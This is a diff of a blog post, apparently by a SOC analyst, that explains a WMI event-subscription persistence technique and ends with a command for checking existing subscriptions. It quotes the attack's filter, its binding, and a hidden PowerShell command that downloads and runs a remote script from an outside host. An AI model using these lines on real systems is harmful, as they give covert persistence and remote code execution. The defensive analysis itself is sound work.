lvl0socanalyst/lvl0socanalyst.github.io/_posts/2025-06-16-my-fourth-post.md

 -----Sets the condition for which the action is triggered (creation of a filter)-----
 - ```Query = "SELECT * FROM __InstanceCreationEvent WITHIN 5 WHERE TargetInstance ISA 'Win32_Process' AND TargetInstance.Name='explorer.exe'"```

 -----Sets the action when the filter is triggered (creation of a consumer)-----
 - ```CommandLineTemplate = "powershell.exe -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http:cozynoobs.com/minecraft.ps1')"```

 -----Binds filter to the consumer (creates condition that runs consumer when filter occurs)
 - ```Set-WmiInstance -Namespace root\subscription -Class __FilterToConsumerBinding -Arguments @{ Filter = $filter.__PATH Consumer = $consumer.__PATH }```

-That was a very dumbed down version of the event subscription.
+That was a very dumbed down version of the actual event subscription used.
 But you get the idea of how it is structured.
 A filter is created which in turn when triggered runs the consumer (action) that runs the suspicious commands.

 The following subscriptions are checked
 - Get-WmiObject -Namespace root\subscription -Class __EventFilter